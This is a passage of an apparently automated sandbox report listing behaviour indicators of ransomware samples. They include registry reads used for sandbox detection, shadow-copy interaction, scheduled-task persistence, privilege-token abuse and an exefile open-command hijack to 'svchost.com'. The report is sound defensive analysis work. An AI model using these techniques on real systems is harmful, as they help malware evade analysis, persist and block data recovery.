Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rundll32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | nc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | key6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ditziw.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | key6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.DoppelPaymer.bf-9d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ditziw.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | HEUR-Trojan-Ransom.MSIL.Thanos.gen-68cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ditziw.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | netsh.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.PornoBlocker.ejtx-724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ditziw.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ncarchive.rar.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ditziw.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | HEUR-Trojan-Ransom.MSIL.Petr.gen-164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
2896 | PING.EXE
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | ditziw.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | ditziw.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | ditziw.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | ditziw.exe
Delays execution with timeout.exe 2 IoCs
pid | Process
7776 | timeout.exe
7252 | timeout.exe
Enumerates system info in registry 2 TTPs 1 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe
Interacts with shadow copies 3 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
8468 | vssadmin.exe
2224 | vssadmin.exe
6216 | vssadmin.exe
6236 | vssadmin.exe
Modifies registry class 52 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000022ad5a689918db0164f06a6e8928db0164f06a6e8928db0114000000 | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 56003100000000005b594980100057696e646f777300400009000400efbe874f77485b5949802e000000000600000000010000000000000000000000000000009f4b1b01570069006e0064006f0077007300000016000000 | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | taskmgr.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\NodeSlot = "2" | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = ffffffff | taskmgr.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | taskmgr.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff | taskmgr.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | taskmgr.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000 | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5a003100000000005b592080100053797374656d33320000420009000400efbe874f77485b5920802e000000b90c0000000001000000000000000000000000000000ae6f6100530079007300740065006d0033003200000018000000 | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | taskmgr.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | taskmgr.exe
Modifies registry key 1 TTPs 1 IoCs
pid | Process
5176 | reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
2896 | PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2812 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 2368 powershell.exe 2368 powershell.exe 2368 powershell.exe 3064 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid | Process
428 | 7zFM.exe
3064 | taskmgr.exe
Suspicious use of AdjustPrivilegeToken 29 IoCs
description | pid | Process
Token: SeRestorePrivilege | 428 | 7zFM.exe
Token: 35 | 428 | 7zFM.exe
Token: SeSecurityPrivilege | 428 | 7zFM.exe
Token: SeDebugPrivilege | 4376 | taskmgr.exe
Token: SeSystemProfilePrivilege | 4376 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 4376 | taskmgr.exe
Token: SeDebugPrivilege | 3064 | taskmgr.exe
Token: SeSystemProfilePrivilege | 3064 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 3064 | taskmgr.exe
Token: 33 | 4376 | taskmgr.exe
Token: SeIncBasePriorityPrivilege | 4376 | taskmgr.exe
Token: SeDebugPrivilege | 2368 | powershell.exe
Token: SeDebugPrivilege | 2156 | HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe
Token: SeDebugPrivilege | 2184 | HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe
Token: SeDebugPrivilege | 4780 | svchost.exe
Token: SeDebugPrivilege | 4780 | svchost.exe
Token: SeDebugPrivilege | 4780 | svchost.exe
Token: SeDebugPrivilege | 2432 | Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe
Token: SeDebugPrivilege | 6044 | AVShieldPro.exe
Token: SeDebugPrivilege | 1088 | HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
Token: SeDebugPrivilege | 5656 | VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
Token: SeBackupPrivilege | 8212 | vssvc.exe
Token: SeRestorePrivilege | 8212 | vssvc.exe
Token: SeAuditPrivilege | 8212 | vssvc.exe
Token: SeBackupPrivilege | 5276 | vbc.exe
Token: SeRestorePrivilege | 5276 | vbc.exe
Token: SeBackupPrivilege | 5148 | vbc.exe
Token: SeRestorePrivilege | 5148 | vbc.exe
Token: SeDebugPrivilege | 8584 | Powershell.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 428 7zFM.exe 428 7zFM.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 4376 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe -
Suspicious use of SetWindowsHookEx 22 IoCs
pid | Process
2520 | HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe
